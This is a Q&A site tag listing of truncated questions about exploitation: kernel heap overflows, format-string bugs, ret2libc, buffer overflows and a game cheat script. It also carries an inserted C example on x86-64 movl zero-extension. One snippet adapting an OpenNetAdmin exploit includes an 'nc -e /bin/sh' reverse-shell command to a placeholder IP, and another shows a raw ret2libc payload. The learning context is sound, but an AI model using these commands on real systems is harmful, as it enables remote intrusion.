Questions tagged [exploit]

An exploit is a piece of software, a chunk of data, or sequence of commands that takes advantage of a bug, glitch, or vulnerability in order to cause unintended or unanticipated behavior to occur. This frequently includes such things as gaining control of a computer system, allowing privilege escalation, or a denial of service attack.

790 questions
-1
votes
1 answer

Does SMAP/SMEP block allocation in userland (kmalloc)?

I am trying to exploit a heap overflow in the Linux kernel with all the protections enabled, i.e. SMAP and SMEP. What I understand is that SMEP doesn't allow me to execute userland code and SMAP doesn't allow me to read or write to userland. But I am…
user40061
-1
votes
1 answer

Format string attack, convert output to readable format in bash

I'm working on a ctf challenge. This is the relevant code section, void details(){ char name[100]; printf("Please enter your name: "); scanf("%100s", name); printf("Hello %s!\n", name); } If I EOF scanf/stdin, printf will…
sven
-1
votes
1 answer

gdb reads wrong input(stdin) values

I input the following in gdb for ret2libc. (gdb) r < <(python -c 'print("\x41"*10 + "\x42"*8 + "\xde\x67\x02\x00\x00\x00\x00\x00" + "\xac\xb1\xf7\f7\xff\x7f\x00\x00" + "\xa0\x08\xe4\xf7\xff\x7f\x00\x00")') The program being debugged has been started…
Kingslayer
-1
votes
2 answers

Bash Syntax Problems for Exploit

I found an exploit at exploit-db for OpenNetAdmin 18.1.1. I have to adjust this script so it works for me, but I don't get this done. This is what I have so far: URL="xxx.xxx.xxx.xxx/ona" while true;do echo -n {"nc -e /bin/sh xxx.xxx.xxx.xxx…
Soteri
-1
votes
2 answers

Buffer overflow: overwrite CH

I have a program that is vulnerable to buffer overflow. The function that is vulnerable takes 2 arguments. The first is a standard 4 bytes. For the second however, the program performs the following: xor ch, 0 ... cmp dword ptr [ebp+10h],…
S. L.
-1
votes
1 answer

How do I send raw bytes interactively for a buffer overflow exploit?

I am trying, as part of an exercise, to exploit a simple program by overwriting the value of a variable through a buffer overflow. I am pretty sure I have the idea behind the exploit figured out, but since I am unable to inject my code I can't know for…
A39-A20
-1
votes
2 answers

Script stops after a few seconds

I have this exploit for Murder Mystery 2. It is a tpcoins and esp exploit. When I enable the tpcoins it will turn off after a few seconds. Is there any way of making it so it stays on? Here's the code: function enableTpCoin() if nameMap ~= "" and…
user9954845
-1
votes
1 answer

Ret2libc unexpected output

I can't understand why when I try to exploit a ret2libc I always get this output sh: 1: 34:ln=01: not found sh: 1: 36:mh=00:pi=40: not found sh: 1: 33:so=01: not found sh: 1: 35:do=01: not found sh: 1: 35:bd=40: not found sh: 1: 33: not found ...…
alexsius
-1
votes
1 answer

How to reverse the effects of movl

So when movl (in Intel x86-64 machine code) is called and has a register as the destination, it sets the higher-order bytes of the register to 0. So how can I use the movl instruction such that I preserve the original value of the register? In this…
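Added example (the editor's, not code from the question) showing the behaviour the question describes: on x86-64 a 32-bit register write such as movl zero-extends into the whole 64-bit register, while 16-bit (movw) and 8-bit (movb) writes leave the high bits alone, so the only way to replace just the low 32 bits and keep the rest is a move into a scratch register followed by a merge. When built with gcc or clang on x86-64 the functions execute the real instructions through inline asm; on any other host they fall back to a C model of the same documented semantics so the file still compiles. The register values used are constructed.

```c
#include <stdint.h>

/* Editor's example, not from the question. Each function takes the value
 * already in a register, performs one write of the given width into it,
 * and returns what the register holds afterwards. On x86-64 the real
 * instruction runs via inline asm; elsewhere a C model of the documented
 * semantics is used so the file still builds. */

/* movl: writing the low 32 bits zero-extends; the high 32 bits are lost. */
uint64_t after_movl(uint64_t reg, uint32_t val) {
#if defined(__x86_64__)
    uint64_t r = reg;
    __asm__ volatile("movl %k1, %k0" : "+r"(r) : "r"(val));
    return r;
#else
    (void)reg;
    return (uint64_t)val;
#endif
}

/* movw: writing the low 16 bits leaves bits 16..63 as they were. */
uint64_t after_movw(uint64_t reg, uint16_t val) {
#if defined(__x86_64__)
    uint64_t r = reg;
    __asm__ volatile("movw %w1, %w0" : "+r"(r) : "r"(val));
    return r;
#else
    return (reg & ~(uint64_t)0xffff) | val;
#endif
}

/* movb: writing the low 8 bits leaves bits 8..63 as they were. */
uint64_t after_movb(uint64_t reg, uint8_t val) {
#if defined(__x86_64__)
    uint64_t r = reg;
    __asm__ volatile("movb %b1, %b0" : "+r"(r) : "r"(val));
    return r;
#else
    return (reg & ~(uint64_t)0xff) | val;
#endif
}

/* There is no movl variant that preserves the high half. To replace only
 * the low 32 bits, do the 32-bit move into a scratch register (it is
 * zero-extended for free) and merge it with the cleared original. */
uint64_t replace_low32(uint64_t reg, uint32_t val) {
#if defined(__x86_64__)
    uint64_t r = reg, tmp;
    __asm__ volatile(
        "movl %k2, %k1\n\t"   /* tmp = (uint64_t)val, high half zero */
        "shrq $32, %0\n\t"    /* r = high half of reg ... */
        "shlq $32, %0\n\t"    /* ... back in place, low half cleared */
        "orq  %1, %0"         /* r |= tmp */
        : "+r"(r), "=&r"(tmp)
        : "r"(val));
    return r;
#else
    return (reg & ~(uint64_t)0xffffffff) | val;
#endif
}
```

The zero-extension is not a quirk to work around but the reason compilers emit `mov eax, ...` or `xor eax, eax` when they want a clean 64-bit value: a 32-bit destination is the cheapest way to clear the upper half. If the upper half matters, the register simply cannot be the direct destination of the 32-bit write.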
-1
votes
1 answer

Segmentation Fault during Exploit

I tried to execute shellcode with a buffer overflow. Unfortunately I get a segmentation fault. In the following, the C code, asm code and exploit code: C Code: int main(int argc, char **argv) { char buffer[64]; gets(buffer); } ASM Code: …
elguerrero
-1
votes
1 answer

C Windows/Linux Buffer Overflow Exploits

I have looked at how buffer overflows work and have determined that the program (with gcc) must be compiled with the following parameters: -fno-stackprotector and -z execstack. You have to tell the kernel that it does not randomly allocate the…
Emanuel Bennici
-1
votes
1 answer

Why is this the structure of the exploit

So I tried following a tutorial: https://sploitfun.wordpress.com/2015/05/08/classic-stack-based-buffer-overflow/ I was struggling with figuring out the order of the exploit code, at least in some way. I don't get the reason for first putting NOPS and…
Jonathan
-1
votes
1 answer

Buffer-Overflow exploit code

Hi, so I'm doing an exploit on the Windows 2000 server as part of an assignment and need a little help. I've attached a screenshot of the exploit code that's in the C document but I don't really understand what…
786
-1
votes
1 answer

GDB - see what has accessed the address / break on it

I am trying to overwrite the function vtable: Here it is done: Before memcpy (gdb) x/100x 0xb7993150 0xb7993150: 0xb6eae130 0xb6eae130 0x41414141 0x41414141 0xb7993160: 0x41414141 0x41414141 0x41414141 …
dev
-1
votes
1 answer

Format String Exploit, unexpected result

I'm trying to implement simple example of Format String Vulnerability in C on 64-bits Linux. Here is my source code: void not_called() { printf("Exploited\n"); } int main(int argc, char **argv) { // Buffer overflow vulnerability char…
Tuomas Toivonen